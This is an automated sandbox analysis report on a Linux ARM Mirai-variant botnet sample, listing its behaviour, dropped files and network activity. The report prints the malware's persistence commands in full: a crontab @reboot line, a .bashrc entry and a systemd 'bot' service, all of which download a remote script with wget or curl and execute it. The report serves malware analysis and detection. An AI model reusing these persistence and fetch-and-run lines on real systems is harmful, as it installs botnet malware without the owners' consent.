Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
armv5l.elf

Overview

General Information

Sample name:armv5l.elf
Analysis ID:1558938
MD5:027f2275ef988530da73aa2fd8fddf30
SHA1:7029a2fc0422cbc11d3a4293b27032f5236c13a9
SHA256:02ca22fed153f80fad5dfd9d63ed7e1c5afb3afa6a38cba9b7851ec06c8ffd9e
Tags:elfuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected non-DNS traffic on DNS port
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1558938
Start date and time:2024-11-20 00:56:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 46s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:armv5l.elf
Detection:MAL
Classification:mal68.troj.linELF@0/4@26/0
Command:/tmp/armv5l.elf
PID:5429
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • armv5l.elf (PID: 5429, Parent: 5353, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/armv5l.elf
    • armv5l.elf New Fork (PID: 5431, Parent: 5429)
      • sh (PID: 5447, Parent: 5431, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 5453, Parent: 5447)
          • sh New Fork (PID: 5455, Parent: 5453)
          • crontab (PID: 5455, Parent: 5453, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5456, Parent: 5453)
          • chmod (PID: 5456, Parent: 5453, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 5457, Parent: 5453)
          • sh (PID: 5457, Parent: 5453, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 5458, Parent: 5453)
          • curl (PID: 5458, Parent: 5453, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
          • sh New Fork (PID: 5461, Parent: 5453)
          • chmod (PID: 5461, Parent: 5453, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
        • sh (PID: 5453, Parent: 5447, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
        • sh New Fork (PID: 5454, Parent: 5447)
        • crontab (PID: 5454, Parent: 5447, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • sh (PID: 5462, Parent: 5431, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/systemctl enable bot"
        • sh New Fork (PID: 5467, Parent: 5462)
        • systemctl (PID: 5467, Parent: 5462, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl enable bot
  • systemd New Fork (PID: 5469, Parent: 5468)
  • snapd-env-generator (PID: 5469, Parent: 5468, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: armv5l.elfAvira: detected
Source: armv5l.elfReversingLabs: Detection: 34%
Source: armv5l.elfString: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv5l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd(|
Source: armv5l.elfString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: armv5l.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca
Source: .bashrc.13.drString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.drString: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: global trafficTCP traffic: 192.168.2.13:34792 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.13:34798 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.13:34796 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.13:34794 -> 8.8.8.8:53
Source: /bin/curl (PID: 5458)Reads hosts file: /etc/hostsJump to behavior
Source: /tmp/armv5l.elf (PID: 5429)Socket: 127.0.0.1:4161Jump to behavior
Source: global trafficTCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443
Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: ch.archive.ubuntu.com
Source: global trafficDNS traffic detected: DNS query: host.zopz-api.com
Source: tmp.bn3aJA.22.drString found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.drString found in binary or memory: http://serverip/bins/bins.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 48202 -> 443
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv5l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd(|
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal68.troj.linELF@0/4@26/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5455)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5454)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /tmp/armv5l.elf (PID: 5431)File written: /root/.bashrcJump to behavior
Source: /usr/bin/crontab (PID: 5454)File: /var/spool/cron/crontabs/tmp.bn3aJAJump to behavior
Source: /usr/bin/crontab (PID: 5454)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/armv5l.elf (PID: 5431)File: /root/.bashrcJump to behavior
Source: /bin/curl (PID: 5458)Directory: /root/.curlrcJump to behavior
Source: /tmp/armv5l.elf (PID: 5447)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
Source: /tmp/armv5l.elf (PID: 5462)Shell command executed: sh -c "/bin/systemctl enable bot"Jump to behavior
Source: /bin/sh (PID: 5456)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 5461)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 5467)Systemctl executable: /bin/systemctl -> /bin/systemctl enable botJump to behavior
Source: /tmp/armv5l.elf (PID: 5429)Queries kernel information via 'uname': Jump to behavior
Source: /bin/curl (PID: 5458)Queries kernel information via 'uname': Jump to behavior
Source: armv5l.elf, 5429.1.0000557a50f72000.0000557a510c5000.rw-.sdmp, armv5l.elf, 5431.1.0000557a50f72000.0000557a510c5000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: armv5l.elf, 5429.1.00007fff5ab66000.00007fff5ab87000.rw-.sdmp, armv5l.elf, 5431.1.00007fff5ab66000.00007fff5ab87000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: armv5l.elf, 5429.1.00007fff5ab66000.00007fff5ab87000.rw-.sdmp, armv5l.elf, 5431.1.00007fff5ab66000.00007fff5ab87000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/armv5l.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/armv5l.elf
Source: armv5l.elf, 5429.1.0000557a50f72000.0000557a510c5000.rw-.sdmp, armv5l.elf, 5431.1.0000557a50f72000.0000557a510c5000.rw-.sdmpBinary or memory string: PzU!/etc/qemu-binfmt/arm
Source: armv5l.elf, 5431.1.00007fff5ab66000.00007fff5ab87000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Unix Shell Configuration Modification
1
Unix Shell Configuration Modification
1
File and Directory Permissions Modification
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scheduled Task/Job
1
Scheduled Task/Job
Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Scripting
Login HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558938 Sample: armv5l.elf Startdate: 20/11/2024 Architecture: LINUX Score: 68 47 185.125.190.26, 443 CANONICAL-ASGB United Kingdom 2->47 49 host.zopz-api.com 2->49 51 ch.archive.ubuntu.com 2->51 55 Antivirus / Scanner detection for submitted sample 2->55 57 Multi AV Scanner detection for submitted file 2->57 10 armv5l.elf 2->10         started        12 systemd snapd-env-generator 2->12         started        signatures3 process4 process5 14 armv5l.elf 10->14         started        file6 45 /root/.bashrc, ASCII 14->45 dropped 63 Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions 14->63 18 armv5l.elf sh 14->18         started        20 armv5l.elf sh 14->20         started        22 armv5l.elf 14->22         started        24 2 other processes 14->24 signatures7 process8 process9 26 sh crontab 18->26         started        30 sh sh 18->30         started        32 sh systemctl 20->32         started        file10 43 /var/spool/cron/crontabs/tmp.bn3aJA, ASCII 26->43 dropped 59 Sample tries to persist itself using cron 26->59 61 Executes the "crontab" command typically for achieving persistence 26->61 34 sh crontab 30->34         started        37 sh chmod 30->37         started        39 sh sh 30->39         started        41 2 other processes 30->41 signatures11 process12 signatures13 53 Executes the "crontab" command typically for achieving persistence 34->53
SourceDetectionScannerLabelLink
armv5l.elf34%ReversingLabsLinux.Trojan.Mirai
armv5l.elf100%AviraEXP/ELF.Mirai.W
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
ch.archive.ubuntu.com
unknown
unknownfalse
    high
    host.zopz-api.com
    unknown
    unknownfalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://serverip/bins/bins.shtmp.bn3aJA.22.drfalse
        high
        http://serverip/bins/bins.sh;bot.service.13.drfalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          185.125.190.26
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.125.190.26mmb9.elfGet hashmaliciousGafgyt, Mirai, OkiruBrowse
            mmb5.elfGet hashmaliciousGafgyt, Mirai, OkiruBrowse
              dvwkja7.elfGet hashmaliciousMiraiBrowse
                jwwofba5.elfGet hashmaliciousMiraiBrowse
                  qkehusl.elfGet hashmaliciousMiraiBrowse
                    vsbeps.elfGet hashmaliciousMiraiBrowse
                      vkjqpc.elfGet hashmaliciousMiraiBrowse
                        arm6.elfGet hashmaliciousMiraiBrowse
                          Satan.sh4.elfGet hashmaliciousUnknownBrowse
                            yakuza.mips.elfGet hashmaliciousMiraiBrowse
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CANONICAL-ASGB.i.elfGet hashmaliciousUnknownBrowse
                              • 91.189.91.42
                              kjsusa6.elfGet hashmaliciousUnknownBrowse
                              • 91.189.91.42
                              mmb6.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                              • 91.189.91.42
                              mmb9.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                              • 91.189.91.42
                              ub8ehJSePAfc9FYqZIT6.arc.elfGet hashmaliciousMiraiBrowse
                              • 91.189.91.42
                              mmb1.elfGet hashmaliciousMirai, OkiruBrowse
                              • 91.189.91.42
                              mmb3.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                              • 91.189.91.42
                              mmb4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                              • 91.189.91.42
                              sshd.elfGet hashmaliciousUnknownBrowse
                              • 91.189.91.42
                              mmb2.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                              • 91.189.91.42
                              No context
                              No context
                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):76
                              Entropy (8bit):3.7627880354948586
                              Encrypted:false
                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                              Process:/tmp/armv5l.elf
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):178
                              Entropy (8bit):4.358630015292201
                              Encrypted:false
                              SSDEEP:3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
                              MD5:C3685F292213652676F734AB36C060EE
                              SHA1:1D05F7F6302EC60E7990DE4BBE9180C149EFC731
                              SHA-256:D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C
                              SHA-512:7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295
                              Malicious:true
                              Reputation:moderate, very likely benign file
                              Preview:./bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".
                              Process:/tmp/armv5l.elf
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):356
                              Entropy (8bit):4.9110117370593995
                              Encrypted:false
                              SSDEEP:6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
                              MD5:F03C70CD4C61A1852F9E19B8FB0D639C
                              SHA1:A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008
                              SHA-256:AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90
                              SHA-512:6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:[Unit].Description=My Miscellaneous Service.After=network.target..[Service].Type=simple.User=root.WorkingDirectory=/tmp.ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".Restart=no..[Install].WantedBy=multi-user.target.
                              Process:/usr/bin/crontab
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):235
                              Entropy (8bit):5.1026069467163655
                              Encrypted:false
                              SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvaaqZHGMQ5UYLtCFt3HY8jsHB:8QjHig8maOeHLUHY8mB
                              MD5:DB95B435A973B00CE1461517298C23C1
                              SHA1:CBD57C4FEE99323B4B3DE15CB4782C2C0B8D6ABD
                              SHA-256:54F6CAA67C31DF27123C4A108DBD70C7ABCD2C550E627AB1909A2B8091A8A4DA
                              SHA-512:102B0EF5245E4C3FC333D9805B2B6EE8EBD32656420415AA1E637E2A4C8AE0C8A65EA509F9E24EA7B4B0B9DBDD8129F82476A6AB043E94FD564C1EC6D0CFEB3E
                              Malicious:true
                              Reputation:low
                              Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Nov 19 17:57:07 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot /bin/bash -c /bin/wget http://serverip/bins/bins.sh.
                              File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                              Entropy (8bit):6.150456244954934
                              TrID:
                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                              File name:armv5l.elf
                              File size:74'600 bytes
                              MD5:027f2275ef988530da73aa2fd8fddf30
                              SHA1:7029a2fc0422cbc11d3a4293b27032f5236c13a9
                              SHA256:02ca22fed153f80fad5dfd9d63ed7e1c5afb3afa6a38cba9b7851ec06c8ffd9e
                              SHA512:b770b466a0a3581a42d64beded092c4880a5ec4038834bff7478611bbdf60bb73acafe4a5bee7652a348c89373c88154002b638f88d9e2342cefa989c3fe83a0
                              SSDEEP:1536:WbjzMHmZkdEd8rcKt231JG7SN4xLj/o9hgaAKnbpD/:WnzMHmZQL2FklLjYhrA4D/
                              TLSH:F573E942BD819F03C5C222F6FBEF01993B157B68D5EB3242E925BF9033868DB1967611
                              File Content Preview:.ELF...a..........(.........4...`!......4. ...(..........................................................f..........Q.td..................................-...L."....=..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                              ELF header

                              Class:ELF32
                              Data:2's complement, little endian
                              Version:1 (current)
                              Machine:ARM
                              Version Number:0x1
                              Type:EXEC (Executable file)
                              OS/ABI:ARM - ABI
                              ABI Version:0
                              Entry Point Address:0x8190
                              Flags:0x2
                              ELF Header Size:52
                              Program Header Offset:52
                              Program Header Size:32
                              Number of Program Headers:3
                              Section Header Offset:74080
                              Section Header Size:40
                              Number of Section Headers:13
                              Header String Table Index:12
                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                              NULL0x00x00x00x00x0000
                              .initPROGBITS0x80940x940x180x00x6AX004
                              .textPROGBITS0x80b00xb00xf7c00x00x6AX0016
                              .finiPROGBITS0x178700xf8700x140x00x6AX004
                              .rodataPROGBITS0x178840xf8840x17070x00x2A004
                              .eh_framePROGBITS0x18f8c0x10f8c0x40x00x2A004
                              .ctorsPROGBITS0x210000x110000x80x00x3WA004
                              .dtorsPROGBITS0x210080x110080x80x00x3WA004
                              .jcrPROGBITS0x210100x110100x40x00x3WA004
                              .dataPROGBITS0x210140x110140x3940x00x3WA004
                              .bssNOBITS0x213a80x113a80x630c0x00x3WA004
                              .commentPROGBITS0x00x113a80xd600x00x0001
                              .shstrtabSTRTAB0x00x121080x560x00x0001
                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                              LOAD0x00x80000x80000x10f900x10f906.12900x5R E0x8000.init .text .fini .rodata .eh_frame
                              LOAD0x110000x210000x210000x3a80x66b43.01620x6RW 0x8000.ctors .dtors .jcr .data .bss
                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                              TimestampSource PortDest PortSource IPDest IP
                              Nov 20, 2024 00:57:08.441629887 CET3479253192.168.2.138.8.8.8
                              Nov 20, 2024 00:57:09.444715023 CET3479253192.168.2.138.8.8.8
                              Nov 20, 2024 00:57:11.464706898 CET3479253192.168.2.138.8.8.8
                              Nov 20, 2024 00:57:12.964732885 CET48202443192.168.2.13185.125.190.26
                              Nov 20, 2024 00:57:15.524701118 CET3479253192.168.2.138.8.8.8
                              Nov 20, 2024 00:57:44.196702957 CET48202443192.168.2.13185.125.190.26
                              Nov 20, 2024 00:57:55.350265980 CET3479453192.168.2.138.8.8.8
                              Nov 20, 2024 00:57:56.356723070 CET3479453192.168.2.138.8.8.8
                              Nov 20, 2024 00:57:58.372742891 CET3479453192.168.2.138.8.8.8
                              Nov 20, 2024 00:58:02.628869057 CET3479453192.168.2.138.8.8.8
                              Nov 20, 2024 00:58:10.850364923 CET3479653192.168.2.138.8.8.8
                              Nov 20, 2024 00:58:11.877019882 CET3479653192.168.2.138.8.8.8
                              Nov 20, 2024 00:58:13.892999887 CET3479653192.168.2.138.8.8.8
                              Nov 20, 2024 00:58:17.989049911 CET3479653192.168.2.138.8.8.8
                              Nov 20, 2024 00:58:26.350498915 CET3479853192.168.2.138.8.8.8
                              Nov 20, 2024 00:58:27.364891052 CET3479853192.168.2.138.8.8.8
                              Nov 20, 2024 00:58:29.380769968 CET3479853192.168.2.138.8.8.8
                              Nov 20, 2024 00:58:33.604914904 CET3479853192.168.2.138.8.8.8
                              TimestampSource PortDest PortSource IPDest IP
                              Nov 20, 2024 00:57:03.349991083 CET5094053192.168.2.131.1.1.1
                              Nov 20, 2024 00:57:07.302699089 CET3517753192.168.2.131.1.1.1
                              Nov 20, 2024 00:57:12.308908939 CET3658653192.168.2.131.1.1.1
                              Nov 20, 2024 00:57:17.313453913 CET4229753192.168.2.131.1.1.1
                              Nov 20, 2024 00:57:18.600055933 CET4780953192.168.2.131.1.1.1
                              Nov 20, 2024 00:57:22.319196939 CET4591653192.168.2.131.1.1.1
                              Nov 20, 2024 00:57:23.850007057 CET5854453192.168.2.138.8.8.8
                              Nov 20, 2024 00:57:27.321486950 CET5833953192.168.2.131.1.1.1
                              Nov 20, 2024 00:57:29.100042105 CET6012153192.168.2.131.1.1.1
                              Nov 20, 2024 00:57:34.349996090 CET5548953192.168.2.138.8.8.8
                              Nov 20, 2024 00:57:39.600049973 CET5922553192.168.2.131.1.1.1
                              Nov 20, 2024 00:57:44.850020885 CET3908853192.168.2.138.8.8.8
                              Nov 20, 2024 00:57:50.100038052 CET4551253192.168.2.131.1.1.1
                              Nov 20, 2024 00:57:52.327488899 CET3793453192.168.2.131.1.1.1
                              Nov 20, 2024 00:57:57.332869053 CET6009853192.168.2.131.1.1.1
                              Nov 20, 2024 00:58:02.338977098 CET3994753192.168.2.131.1.1.1
                              Nov 20, 2024 00:58:05.600140095 CET4437153192.168.2.131.1.1.1
                              Nov 20, 2024 00:58:07.342664003 CET5365953192.168.2.131.1.1.1
                              Nov 20, 2024 00:58:12.346016884 CET4629753192.168.2.131.1.1.1
                              Nov 20, 2024 00:58:21.100701094 CET4351353192.168.2.131.1.1.1
                              Nov 20, 2024 00:58:36.600176096 CET5414753192.168.2.131.1.1.1
                              Nov 20, 2024 00:58:37.355235100 CET5833753192.168.2.131.1.1.1
                              Nov 20, 2024 00:58:42.358175039 CET4378853192.168.2.131.1.1.1
                              Nov 20, 2024 00:58:47.364419937 CET5502553192.168.2.131.1.1.1
                              Nov 20, 2024 00:58:52.370511055 CET5869653192.168.2.131.1.1.1
                              Nov 20, 2024 00:58:57.374459028 CET5073253192.168.2.131.1.1.1
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Nov 20, 2024 00:57:03.349991083 CET192.168.2.131.1.1.10xd76dStandard query (0)ch.archive.ubuntu.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:07.302699089 CET192.168.2.131.1.1.10x7cb4Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:12.308908939 CET192.168.2.131.1.1.10x7cb4Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:17.313453913 CET192.168.2.131.1.1.10x7cb4Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:18.600055933 CET192.168.2.131.1.1.10xd76dStandard query (0)ch.archive.ubuntu.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:22.319196939 CET192.168.2.131.1.1.10x7cb4Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:23.850007057 CET192.168.2.138.8.8.80xd76dStandard query (0)ch.archive.ubuntu.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:27.321486950 CET192.168.2.131.1.1.10x7cb4Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:29.100042105 CET192.168.2.131.1.1.10xd76dStandard query (0)ch.archive.ubuntu.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:34.349996090 CET192.168.2.138.8.8.80xd76dStandard query (0)ch.archive.ubuntu.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:39.600049973 CET192.168.2.131.1.1.10xd76dStandard query (0)ch.archive.ubuntu.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:44.850020885 CET192.168.2.138.8.8.80xd76dStandard query (0)ch.archive.ubuntu.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:50.100038052 CET192.168.2.131.1.1.10xd76dStandard query (0)ch.archive.ubuntu.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:57:52.327488899 CET192.168.2.131.1.1.10x5cd5Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
